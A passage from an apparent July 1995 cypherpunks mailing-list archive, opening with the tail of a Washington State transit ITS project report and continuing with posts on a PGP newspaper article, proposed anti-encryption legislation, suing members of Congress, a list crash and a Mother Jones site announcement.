large scale area-wide test of a signal priority system (Pierce Transit has jumped into the forefront of testing signal priority, and may have a different signal priority system operational in Tacoma around March, 1995). The proposal was approved and an agreement between FHWA and WSDOT has been drafted by FHWA. At a coordination meeting on May 10, 1994, it was decided to combine this project with part of the SR 99 signal project, so as to only have one signal priority project within Snohomish County (Metro does not have authority to do any work outside King County). The WSDOT-FHWA Cooperative Agreement was approved on June 17, 1994. WSDOT Northwest Region is preparing the Local Agency Agreement between WSDOT and Community Transit. The Local Agency Agreement has been sent to Community Transit. The project may be revised in how it is coordinated with two other related projects in the area (the SR 99 project and the Metro AVI purchase project). As of March, 1995, the Local Agency Agreement is close to being finalized. Larry Ingalls of CT is developing a work plan for the project. Installation of hardware on the buses is dependent on the Metro region wide AVI purchase project. .c.Additional ITS Projects % .c.Regional Automated Trip Planning.; (Wayne Watanabe) King County Metro is participating with Community Transit and Pierce Transit in the development of a regional transit trip planning system. The system will allow any information operator at any of the three agencies to enter origins and destinations within the region. The system will automatically produce a trip itinerary including travel times, fares, and transfers. Current effort is focused on developing geographic information system (GIS) hardware and software capability in Pierce and Snohomish counties. King County is nearly done with its GIS component. This project is scheduled to be complete in 1997. % .c.Regional Ridematch.; (Roland Bradley) King County Metro is participating with Community Transit and Pierce Transit in the development of regional ridematching software. The system will allow ridematch staff at any of the three agencies to enter ridematch requests into a regional database. This system will replace an existing regional ridematch system that limits the ability of agencies to offer geographic information system based matches, match maps for customers, and on-line ridematching. The project is scheduled to be complete in 1997. % .c.Regional Ridematch Hotline.; (Roland Bradley) This project will provide one 1-800 telephone number for anyone in King, Snohomish, and Pierce counties to use for ridematch assistance. This project is scheduled to be complete in 1996. % .c.Regional Fare Integration Project.; (Candace Carlson) King County Metro is participating with Community Transit, Pierce Transit, Everett Transit, Kitsap Transit, Washington State Ferries, the RTA, PSRC, and the Cascadia Project to provide seamless regional fare media that makes it easier to make inter-county trips within the Puget Sound region. The project team is currently evaluating several technologies including smart cards and magnetically encoded cards. The analysis phase will conclude in 1995 and a demonstration of the selected technology will be in place by the end of 1996. % .c.Smart Bus.; (David Cantey) King County Metro is beginning the implementation of a smart bus strategy that will integrate electronic information systems on-board buses. The current order for 360 buses includes J-1708 wiring which will provide the backbone of the "vehicle area network." J-1708 is an SAE standard developed and adopted by ITS America. A contractor has been hired to integrate the automatic passenger counting systems and automatic vehicle location systems on board the 10% of the current fleet that have APC systems installed. .c.other Projects % .c.Traffic Congestion Monitoring-Urban Areas.; (Bill Legg or Mark Hallenbeck) There are three basic objectives for this study. (1) Develop a comprehensive understanding of the congestion monitoring needs and expectations of local, state, and federal governments and agencies. (2) Define the alternative methods for performing that monitoring function. (3) Develop cost and staffing estimates that can be provided to state officials in decision package form, so that a monitoring system based on one of these alternatives can be implemented. This project will provide a resource document that lists the potential methods for monitoring congestion in the state's urban areas. It will describe the types of data that need to be collected, the strengths and limitations of each of the methods or combinations of methods that can be used for collecting those data, and preliminary costs for implementation of those data collection procedures. The project will provide descriptions of both systems that can be implemented using currently available technologies, and those systems that rely on technologies that are currently experimental but may provide greater levels of information gathering at a lower cost than traditional methods, if the new methods are implemented on an urban scale. The Phase 2 draft report is being revised to reflect comments received from review. % .c.ENTERPRISE.; (Bill Legg ) The ENTERPRISE Program represents an international forum for collaborative research, development, and deployment ventures. This forum will facilitate the sharing of technological and institutional experiences gained from the IVHS programs conceived and initiated by each participating entity. The cooperative and collaborative objectives of the ENTERPRISE Program provide for a more efficient use of resources than a series of independent initiatives. The synergistic effect of this forum is an accelerated implementation of IVHS programs. Current members of ENTERPRISE aside from WSDOT include; CDOT, AzDOT, MinnDOT, IDOT, MichDOT, NCDOT, Maricopa County DOT in AZ. FHWA, Ministry of Transportation of Ontario, Transport Canada, and Rijkswaterstaat (Netherlands DOT). Others considering joining are NYDOT, and the Federal DOT of Mexico. ENTERPRISE holds quarterly meetings, in 1994 that will be changed to 3 times a year. The last meeting of ENTERPRISE was held in April 1994. The next meeting will be in September, 1994 followed by a December 1994 meeting to be held in Seattle. I have notes as well as minutes of previous meetings. In conjunction with the September meeting ENTERPRISE will cosponsor the 2nd annual Rural IVHS conference with IVHS America. The first Rural IVHS conference was held in February, 1993, it was sponsored by ENTERPRISE. ENTERPRISE is the major backer of ITIS, which is the development of an international standard for communications between the roadside and vehicles. ENTERPRISE is also working on joint funding of several project proposals submitted by member organizations. One project that is currently underway is HERALD, which is investigating using an AM sub-carrier to deliver road and construction information to motorists in rural areas. ENTERPRISE submitted two proposals to FHWA as demonstration projects; the first is a second phase of the HERALD project, the second is a wide scale MAYDAY project. FHWA accepted both of these projects for funding, they are now just getting underway; the interagency agreements and contracts are being developed and signed by the involved parties. Since WSDOT is a partner in a second funded MAYDAY operational test we will be working closely with ENTERPRISE to avoid duplication in effort and to share information. I will use this report to provide updates on the ENTERPRISE operational tests. The latest meeting for this group was held in Phoenix in April. The next meeting will be in Minnesota in September in conjunction with the 1995 Rural ITS conference. The 1996 rural ITS conference will be held in Spokane, WSDOT will be the host agency. % .c.Accident Risks Using Roadway Geometrics.; (Eldon L. Jacobson, Fred L. Mannering) The work is being done by John Milton, a WSDOT graduate student. The primary objective of this project is to test the statistical validity of the accident prediction method WSDOT is developing and utilizing. The findings of this research will be used to develop a weighted equation for use in the Department's safety program. The data has been collected and most of the literature review has been completed. Development and testing of accident frequency models began at the end of December, 1994. % .c.Advanced Transportation Technology Application Policy Plan.; (Bill Legg) This effort is looking at establishing ITS, or in this case Advanced Transportation Technology, as a new policy area in the Transportation Policy Plan for Washington State. The first subcommittee meeting on this effort will be held on July 11th. A second meeting will be held in August. - ------- End of Forwarded Message ------- End of Forwarded Message From alan.pugh at internetmci.com Fri Jul 14 10:14:35 1995 From: alan.pugh at internetmci.com (Alan Pugh) Date: Fri, 14 Jul 95 10:14:35 PDT Subject: pgp mention Message-ID: <01HSV0ZF4V7M937K02@MAILSRV1.PCY.MCI.NET> -----BEGIN PGP SIGNED MESSAGE----- hello all, nothing new here. there are some obvious errors in this article, most notably that it claims phil z. uploaded pgp to the internet, while phil claims this is not so. anyhow, i figure mention in the mass press is reason enough to post here... ===begin=== Date: Thursday, 13-Jul-95 05:12 AM Encryption software keeps unauthorized readers out of your e-mail I think you've known me long enough to trust me. So I hope you won't mind letting me read your mail. What's that? You object to my reading your mail? You say that your private correspondence is none of my business? Fair enough. I feel the same way about my mail. That's why I put my letters in envelopes. But what about the messages we exchange over computer networks? Any computer is a profoundly insecure place for storing private information. As more people communicate over computer networks, they expose themselves to severe embarrassment, or worse. A determined government agency or corporation could tap the Internet or other data networks, and gather all manner of financial, political or personal information. But the same technology that makes this snooping possible is making it possible for people to make communications virtually unreadable by anyone except the people they're meant for. It's done using software that encrypts information _ turns it into a collection of gibberish. But this mishmash of symbols can be read by someone who possesses the key, a kind of electronic letter-opener. Encryption has been around quite awhile. The first coded messages we know about were sent by the soldiers and diplomats of Sparta about 2,400 years ago. But few private citizens have ever bothered to write in code. Most of us don't have many secrets. And the few we do have aren't important enough to justify the immense complexity of a really good code system. But when you have millions of people swapping E-mail on easily tapped computer networks, attitudes start to change. Especially when the computer itself can encode your messages in a form that's nearly unbreakable. The idea is to apply an algorithm, or mathematical formula, that can be used to code and decode any message. By the way, you don't have to keep the formula secret. If the algorithm is really good, it won't matter if a potential code-breaker knows it by heart. Run a message through the algorithm, and even an expert code-breaker will need the key to read it. Traditionally, going for the key has been the best way to break a code. British and American researchers during World War II figured out the keys to the German Enigma coding machine, and read Hitler's mail. But in 1971, Whitfield Diffle and Martin Hellman came up with a much tougher coding scheme, called public key cryptography. It relies on two keys. One, the public key, is used only to encode messages. You give this key to everybody who wants to send you a coded message. But the public key can't be used to read messages. For that, you use a second, private key. When you receive a coded message, you run it through your coding program along with your private key. Each key is a collection of letters and numbers generated by the coding program. The longer the keys, the tougher it is to break the code. But even a state-of-the-art public key system can be broken. All you'll need is a supercomputer and several million years _ the time it'll take to work through every possible solution. It also takes a fair amount of computing power to use a public key system. When Diffle and Hellman came up with the idea, only corporations and governments had computers capable of the job. Now, millions of us do. In addition, we now link these machines together over worldwide networks. Millions of us use computer networks to make credit-card purchases, exchange business data, or write love letters. All of which means we need a way to ensure that information we send can be read only by those it's aimed at _ cryptography for the masses. And now we have it, thanks to Philip Zimmermann, anti-nuclear activist, software engineer and author of Pretty Good Privacy (PGP). It's a program many cryptography experts consider well-nigh unbreakable. You can order a commercial version of PGP from ViaCrypt, an Arizona company. You pay $100 for the DOS version, $125 for Windows or Mac. Call 1-602-944-0773, 10-7 weekdays. But the original PGP program is freeware. You can download it at no charge from the Massachusetts Institute of Technology's FTP site (net-dist.mit.edu, in the pub/PGP directory) or from the National Computer Security Association Forum on CompuServe. The latest version is called PGP262.ZIP. When you try to download PGP, you'll be asked whether you're a U.S. citizen. If you don't answer yes, you won't get the program. MIT and CompuServe don't care if you're phoning in from Jupiter. They're just trying to protect themselves. They don't want to end up like Zimmermann, who has spent the last three years trying to keep out of jail. It all began in 1991, when Zimmermann was designing PGP. He heard Congress was considering a law to ban the use of encryption software. His left-wing instincts roused, Zimmermann quickly finished his program, and then uploaded it to an Internet site. Once unleashed, no government would be able to restrict PGP. Sure enough, PGP was soon being used by people all over the United States. No problem _ the bill never passed. But when Internet users outside the U.S. started downloading it, the federal government put the Zimmermann case in front of a grand jury. It seems that selling encryption software to foreigners is a federal crime, on the same scale with peddling plutonium. The fact that Zimmermann didn't sell PGP may or may not help him. The grand jury has been at work since 1992, trying to decide whether to issue an indictment. Zimmermann could get up to four years in prison. It's easy to denounce this assault on freedom, but the authorities have a point. Most PGP users are honest citizens with a taste for privacy. But the coding and encoding software works just as well for terrorists, mobsters or child molesters. Cheap, powerful encryption software will make life a lot tougher for the people who work to keep us all safe. But then, the cops would also have an easier job if we all just agreed to let them open everybody's mail. How about it? X X X (You can send electronic mail to Hiawatha Bray. If you're on the Internet, send it to: watha(at)det-freepress.com; On Compuserve, write to: 72662,2521; America Online users, write to: WathaB.) KNIGHT-RIDDER-WASHINGTON--07-12-95 0914EDT -0- By Hiawatha Bray Knight-Ridder Newspapers *** End of story *** -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMAZbCigP1O9KJoPBAQHe+wf/bICqNHngGDGaK6ECIOy39OhHPdHxzdMw zlU3ptgGrFpSmKyb1PqXSK3U41QfPCC2WDTLcxtxZHfE7J1DHkiptBvcwB5Sm6wJ 4i6PnCgCoot9EX4I8iG+WwAoujIUsDg2/7xoO6ba5daykFTBeeSw8iGac4O6j4aX bz2JSpr3DsSQK7neB2HdeXp3Ovp7/qwM8Hx0nKn5ml/otFl6DUk6+7khLo5CvRG7 ei+aRMxn3H0B6EsFqB5s///RA3MuM1327ZzqAubIBaXpCU0VNK6M462oDDh8cTu1 u6gCnGKS5pT8imFBID8vu0S2P8ME8opl937B/aGrYhgzvoI2oZ0NKA== =I6XV -----END PGP SIGNATURE----- ********************************************* * / Only God can see the whole * * O[%\%\%{<>===========================- * * \ Mandlebrot Set at Once! * * amp * * <0003701548 at mcimail.com> * * * ********************************************* Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D From Michael at umlaw.demon.co.uk Fri Jul 14 10:25:00 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Fri, 14 Jul 95 10:25:00 PDT Subject: (none) Message-ID: <2387@umlaw.demon.co.uk> In message "Robert A. Hayden" writes: [major cuts everywhere] > > I've received about a dozen requests to clarify my rant earlier about > what I think needs to be done about the future of the CPs and the net, > now that the official declaration of war has been made by the government. Let's all take a deep breath here. If the Grassley bill becomes law, this sort of talk may have merit. At this stage, it's too strong. So far the only declaration made is by one or more Senators, not "the government". > 2) PUSH FOR UNIVERSAL DIGITAL SIGNATURES > In my version of utopia, all digital messages are signed. Unfortunately, > right now, there are no mechanisms in place to achieve that. Sadly, the American Bar Association project that is writing model legislation for this has been delayed. A public discussion draft, which should really move the ball forward, is not going to happen until after our next meeting in August. Expect something published on the web in mid-September. Model legislation is needed to sort out liability issues, for example, without which large companies are afraid to enter the business. -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From sebaygo at intellinet.com Fri Jul 14 10:35:24 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Fri, 14 Jul 95 10:35:24 PDT Subject: misfeasance in office (was: Re: Root Causes) In-Reply-To: <9507140252.AA13485@snark.imsi.com> Message-ID: On Thu, 13 Jul 1995, Perry E. Metzger wrote: > David K. Merriman writes: > > > > Is there any precedence or possibility of either filing civil or criminal > > charges against a Government official for their _official_ actions? > > Not only is it a bad idea politically, but in fact members of congress > are made specifically immune by the constitution from any legal action > being taken against them for their words or actions during sessions of > congress by any body other than congress. While I recognize this to be the case, it remains exceedingly frustrating. It would seem that a textbook example of misfeasance (not malfeasance) would be the act of introducing and/or participating in the passage of legislation that a member knew or should have known was unconstitutional -- at least when misfeasance is defined as "the performance of a duty or right which one has the right to do, but in a manner such as to infringe upon the rights of others." [anno. 20 ALR 104] AR %#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#% "Government is not reason... it is force. Like fire, it is a dangerous servant and a fearful master." - George Washington +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Allen Robinson...................................sebaygo at intellinet.com PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A From sebaygo at intellinet.com Fri Jul 14 10:42:52 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Fri, 14 Jul 95 10:42:52 PDT Subject: Suing/Reputations (was: Root Causes) In-Reply-To: <199507140314.XAA05815@yakko.cs.wmich.edu> Message-ID: On Thu, 13 Jul 1995, Damaged Justice wrote: > Title 42 of the United States Code is the section that describes > the process by which one may sue a government official. However: > > "...an officer may be held liable in damages to any person injured in > consequence of a breach of any of the duties connected with his > office...The liability for nonfeasance, misfeasance, and for malfeasance > in office is in his 'individual', not his official capacity..." 70 > AmJur2nd Sec. 50, VII Civil Liability. > > So the trick is to sue the offender as an individual, and not as a > government official. I composed my "misfeasance in office" post before reading this thoughtful and well researched message from Damaged Justice. I had read all of the messages in my mailbox with "Re: Root Causes" as the subject, but missed this one, since the subject line had been changed. Damaged Justice has looked into this in much greater depth than I have, and raises some interesting possibilities. (Obviously, IANAL.) AR %#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#% "Government is not reason... it is force. Like fire, it is a dangerous servant and a fearful master." - George Washington +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Allen Robinson...................................sebaygo at intellinet.com PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A From hayden at krypton.mankato.msus.edu Fri Jul 14 10:45:10 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 14 Jul 95 10:45:10 PDT Subject: Minnesota Cypherpunks Meeting Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I mentioned this before and there seemed to be support, but I wanted to bring it up again hoping somebody in the cities can grab the ball and run with it (I doubt y'all wanna drive to Mankato :-) Anybody wanna plan for a Minnesota CP Physical meeting sometime soon? Maybe on Friday the 28th or something? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMAatLjokqlyVGmCFAQEutgQAmNL494sDhzzGXw2M/RW3PvmOYruv1cwA PesJpE31LDr5S2i4Qi+59/LDkv2FY9Ut90FfrQj8dNtwF1CvFQUcEFIZrMpApsK9 O+/vUkO7Q4DZ0vXrYvSbpKY/03mqy7dvWKCY1d/wFc4Il8G/GgdHvASavHEKv6At H5OICAkXM9M= =AfJm -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From Michael at umlaw.demon.co.uk Fri Jul 14 11:04:13 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Fri, 14 Jul 95 11:04:13 PDT Subject: Russians seek expert help Message-ID: <2340@umlaw.demon.co.uk> A collegue from Russia sent me an email that I expert (with permission): Forwarded message follows: > Upon my return to Russia I have met with > one of the best information protection & computer > data security firms in Russia. They have > their own developments in the field of computer > security and, noteably, the special journal > devoted to the cryptography and other information > protection technics as well as legal aspects > of these technologies. It is the single and thus > best publication of this kind in Russia. > > They have asked me to help them to get in > touch with western specialists in the field > of law & information technology protection. > They would be happy to publish some articles (translations, > of course) and find other ways of cooperation. > > I suggest that either you personally or colleagues > of yours would be interested in communicating > on these matters with Russian specialists. > > Their contact e-mail is hotline at confident.spb.su > You may address the message to Petr Kuznetsov, > he is a director of this firm. > > cc: Peter Kouznetsov > -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From Andrew.Spring at ping.be Fri Jul 14 11:05:38 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Fri, 14 Jul 95 11:05:38 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: >---------- Forwarded message ---------- >Date: Wed, 12 Jul 1995 15:28:25 -0400 >Subject: Anti-Electronic Racketeering Act of 1995 > > > "(2) to distribute computer software that encodes or encrypts > electronic or digital communications to computer networks that the > person distributing knows, or reasonably should know, is accessible to > foreign nationals and foreign governments, regardless of whether such > software has been designated nonexportable." Christ, these guys are so predictable. What do want to bet that the last clause of that paragraph was put in, just so it could be taken out? Netscape, Apple, Novell et al testify before Congress; complain that their crippled crypto has already been approved for export; they'll lose so much money in sales, blah blah blah. Grassley smiles for the camera, says "I'm a reasonable man", strikes out the last clause. Isn't democracy wonderful? -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From rittle at comm.mot.com Fri Jul 14 11:25:25 1995 From: rittle at comm.mot.com (Loren James Rittle) Date: Fri, 14 Jul 95 11:25:25 PDT Subject: List Crash? Message-ID: <9507141823.AA01659@supra.comm.mot.com> I see the cypherpunks' mailing list lost it's mind again. It has been awhile since this happened. Was it an accident or sabotage? Loren From pjm at ionia.engr.sgi.com Fri Jul 14 11:31:42 1995 From: pjm at ionia.engr.sgi.com (Patrick May) Date: Fri, 14 Jul 95 11:31:42 PDT Subject: Legislation question... In-Reply-To: <199507140331.AA07147@tyrell.net> Message-ID: <199507141831.LAA07706@ionia.engr.sgi.com> -----BEGIN PGP SIGNED MESSAGE----- Perry E. Metzger writes: > BTW, in re suing congressmen > > "The Senators and Representatives shall [...] in all cases, except > treason, felony and breach of the peace, be privileged from arrest > during their attendance at the session of their respective Houses, and > in going to and returning from the same; and for any speech or debate > in either House, they shall not be questioned in any other place." > > The last part being operative. Article VI Clause 3. The Senators and Representatives before mentioned, and the Members of the several State Legislatures, and all executive and judicial Officers, both shall be bound by Oath or Affirmation, to support this Constitution; but no religious Test shall ever be required as a Qualification to any Office or public Trust under the United States. Does any mechanism exist for removing Oath-breakers from office? Any member of Congress who proposes or votes for (as distinguished from "speech or debate") unconstitutional legislation has clearly violated their Oath, and hence are no longer legitimate holders of the office. Would someone who refused to be "bound by Oath or Affirmation" be allowed to take a seat in the Congress? If not, why should an Oath-breaker be allowed to? Yes, I know, they'll do whatever the hell they want. Regards, Patrick May -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAa4BO5Yg08fDKehAQGOQgQAjBP3g5LZY6YE/8IHsG/PXFlyE4PNYRaP cIZ+y9MKWPP81kQPqGggnrDl6DcllWQmNW+cNrcOXraJnLutUlXDEnY6s3TXP34h 5L8oFzUNJSBl3GqKHxXOMMVdDXUeB8afUxbmCHrCQjq5QLSux4uIGBRd44VfVW4C dxoBmom+FQU= =kfH+ -----END PGP SIGNATURE----- From jbarth at cozumel.picnet.com Fri Jul 14 11:56:14 1995 From: jbarth at cozumel.picnet.com (Jeffrey Barth) Date: Fri, 14 Jul 95 11:56:14 PDT Subject: The MoJo Wire thanks you In-Reply-To: Message-ID: I am not sure if you realize that this discussion is appearing all over the place. I am somewhat interested in this conversation, but not really. ================================================================== Potomac Interactive Corporation ------------------------------------------------------------------ E-mail: jbarth at picnet.com Voice: 703.276.0181 Fax: 703.276.2981 ================================================================== On Fri, 14 Jul 1995, Nicholas Samuels wrote: > With this message, you also included a note from silversh at rmmi.com, > wishing to "unsubscribe." Since I don't administer your listserv, you > might want to do something with that. > > On Thu, 13 Jul 1995, Joel B. Truher wrote: > > > Thank you for your help in our beta test! Please come back soon, > > and send me mail if you'd like to be removed from this mailing > > list -- we may send a new Web product announcement every few months, > > and you'll soon receive a survey of your opinion of our site. > > > > More info on The MoJo Wire: > > > > > > "More fun than a secret decoder ring!" > > -- Jim Hightower > > > > "Mother Jones magazine is turning the tables [on Gingrich]" > > -- LA Times > > > > Mother Jones is pleased to announce the official release of our > > redesigned WWW site, now called The MoJo Wire, on July 14th, at: > > > > http://motherjones.com > > > > * See Newt Gingrich's secret list of major funders on our "Coin- > > Operated Congress" feature. Gingrich is fighting the FEC in > > court to keep this information secret, but you can see it here > > for the first time. See the ten worst, the ten richest, the > > dirt on all of them, and help complete this interactive > > investigation project. > > > > * Newly revamped on-line chat software, called Live Wire, > > provides the best Web-based political discussions anywhere. > > Create hyperlinks in the words of others in this new feature, > > which already contains several lively debates. > > > > * The July/August issue of Mother Jones magazine is available > > only on The MoJo Wire. Read the full text of the magazine. > > > > Many thanks to our team of two thousand beta testers! With your > > help, we've worked a few of the last kinks out of the system, > > added a few things, and now offer the service password-free. > > > > For more information about The MoJo Wire, send mail to > > truher at mojones.com, or call me at 415-665-6637. > > > > Joel Truher > > Manager, The MoJo Wire > > > > > > > From jya at pipeline.com Fri Jul 14 12:07:23 1995 From: jya at pipeline.com (John Young) Date: Fri, 14 Jul 95 12:07:23 PDT Subject: Toad Hit? Message-ID: <199507141907.PAA15038@pipe2.nyc.pipeline.com> Is there an after-action report available? Responding to msg by Majordomo at toad.com () on Fri, 14 Jul 11:58 AM >-- > >Your request of Majordomo was: >>>>> who cypherpunks >Members of list 'cypherpunks': > >Panu.Rissanen at lut.fi >hugh >eric at remailer.net >gnu >losburn at omcssi.com >adwestro at ouray.cudenver.edu >krs at caos.aamu.edu >hfinney at shell.portal.com >tomb at syntec.com >hank at rumple.org >tcmay at sensemedia.net >heling at harry.sar.usf.edu >bbrown at gtenet.com >cypherpunks at cs.du.edu >rittle at comm.mot.com >bdolan at use.usit.net >jfleming at copper.ucs.indiana.edu >jya at pipeline.com From gate at id.WING.NET Fri Jul 14 12:40:07 1995 From: gate at id.WING.NET (The Gate) Date: Fri, 14 Jul 95 12:40:07 PDT Subject: Root Causes In-Reply-To: <199507140151.UAA01504@arnet.arn.net> Message-ID: I think this is a good idea... On Thu, 13 Jul 1995, David K. Merriman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > While I respect the ideas and opinions submitted by the majority of the > members of this list, I wonder if perhaps we're failing to deal with the > _root_ problem of such things as the CDA, Clipper, DTA, etc. > > Specifically, I wonder if it wouldn't be a better approach to *prevent* such > measures from ever being proposed in the first place. > > (pause to adjust nomex undies and titanium body armor :-) > > Is there any precedence or possibility of either filing civil or criminal > charges against a Government official for their _official_ actions? > Something that will not only make for some Serious Press, but hit them from > an unexpected angle? > > (close hatch on bunker :-) > > It would seem that things such as the CDA, etc, are patent violations of the > Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such > measures be violating our civil rights, and thus be criminally liable? > Aren't Congressrodents supposed to take an Oath of Office that involves > upholding the Constitution? > > Alternatively, could a civil suit be filed for invasion of privacy or > somesuch? Or perhaps the previously mentioned violation of civil rights (a > la Rodney King)? > > How many laws, etc, can we invoke? I mean, most congresscritters don't craft > laws on their own, so the involvement of their staff would constitute > conspiracy, as well, wouldn't it? > > I'd think that if a few of the were sued > and/or tried, it would sure make the rest of them consider the full > implications of any laws they might consider proposing. Too, it might > accidentally ripple through all of the Government, and settle down some of > the beaurocrats that aren't subject to voters. > > IANAL, of course, so I'll leave it up to those on the list who are to > express more informed opinions; still, it _seems_ like a possible course of > action..... > > Dave Merriman > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMAWqT8VrTvyYOzAZAQFPiwQAluzkD3H+AcUFr7qNhf84I7Y3FNB27Lxc > jQQ5UQnYgvQpHhlExJGmxDjebbOgbOik5Xu2KoQYbdutc/LBWHN6OzfLWim9jWwq > C1nKEnDUo1jKQ+LcsV0/TGrwKPUYVnOhswZPydn50xnKF3KuW17RnXFeYJi+DTdZ > D3YtxRa2shc= > =JiVo > -----END PGP SIGNATURE----- > This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th > of the PGP executable. See below for getting YOUR chunk! > ------------------ PGP.ZIP Part [015/713] ------------------- > M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X > MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 > M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M > ------------------------------------------------------------- > for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ > > > ____________________________|||||||||||||||||||||______________________________ R. Leland Lehrman at The Gate, New Haven, CT. http://id.wing.net/~gate/gate.html God, Art, Technology and Ecology Research and Development >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>> From hayden at krypton.mankato.msus.edu Fri Jul 14 12:41:37 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 14 Jul 95 12:41:37 PDT Subject: DOH! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I see that the subscription rolls got nuked again. *sigh* Did I miss anything juicy after the rants of yesterday? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMAbIizokqlyVGmCFAQHHUAQA0gTXvdTsIfY+l2yKXhbVcYJh38Ud1Tx9 ald4e52YaTW2256rOxmuoN1pBSu1rnpjWkEytHRHJ12rkLSrocAKT66Xk0wW0o7t Pml8gLFlpX4XznmTNkGV36Vv7s0ly+sDsJxd4R8WIXEpCr77I9Pyc1WIiJW3Oo/1 gJFHp0vBCzE= =qLuY -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From schwartz at bach.convex.com Fri Jul 14 12:49:15 1995 From: schwartz at bach.convex.com (Adam E. Schwartz) Date: Fri, 14 Jul 95 12:49:15 PDT Subject: The MoJo Wire thanks you In-Reply-To: Message-ID: <199507141542.KAA12126@bach.convex.com> hello everybody, Please direct all your future replies related to this message and the Mother Jones junk to truher at mojones.com Also, please do *not* "group reply": check to ensure that only truher at mojones.com is included in the "To:" part of the email header, and do not include anyone in the "Cc:" part of the email header. Thanks very much. (BTW, I have absolutely nothing to do with Mother Jones or its WWW site.) Nicholas Samuels writes: > >With this message, you also included a note from silversh at rmmi.com, >wishing to "unsubscribe." Since I don't administer your listserv, you >might want to do something with that. From tj at compassnet.com Fri Jul 14 13:11:04 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Fri, 14 Jul 95 13:11:04 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: "Overweaning." "Iowa." Yes, yes, I know. Fingers think for themselves. Too used to typing "weenie." Just read DOJ report. Don't write. Bolivar From gate at id.WING.NET Fri Jul 14 14:01:14 1995 From: gate at id.WING.NET (The Gate) Date: Fri, 14 Jul 95 14:01:14 PDT Subject: Free The World Web Server project.. :) Message-ID: 15:57 EST July 14th, 1995 New Haven, CT. From the Yale Computer Center: Got an idea for y'all, from the heart and mind of Elizabeth Walker, with whom I live. Let's set up a web site where someone can submit a letter that will be automatically sent to every senator, congressperson, elected and appointed federal official. If we run into trouble, we can scale it down, narrow the various target areas... Also, we could write our own letters, post them, and if someone wants to resend it, they could do so at the click of the mouse. Example, someone logs on to the Freedom Speaks webserver, and is greeted by the message, "Welcome, enter your message for Federal officials in the box provided, then hit the submit button." "If you would like to submit one of our pre-written letters, just click on any of the ones you see below." For those without web access, we could set up a mailing list to do the same. I.e. to send a message to all our elected and appointed officials, send message to freetheworld at gateway.net. From there it gets spooled everywhere. What do you think? I could probably do it somehow, but someone with access to better resources and knowledge of cgi-bin might be better for the job. If anyone is interested in this project, let me know... R. Leland Lehrman ____________________________|||||||||||||||||||||______________________________ R. Leland Lehrman at The Gate, New Haven, CT. http://id.wing.net/~gate/gate.html God, Art, Technology and Ecology Research and Development >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>> From unicorn at access.digex.net Fri Jul 14 14:44:19 1995 From: unicorn at 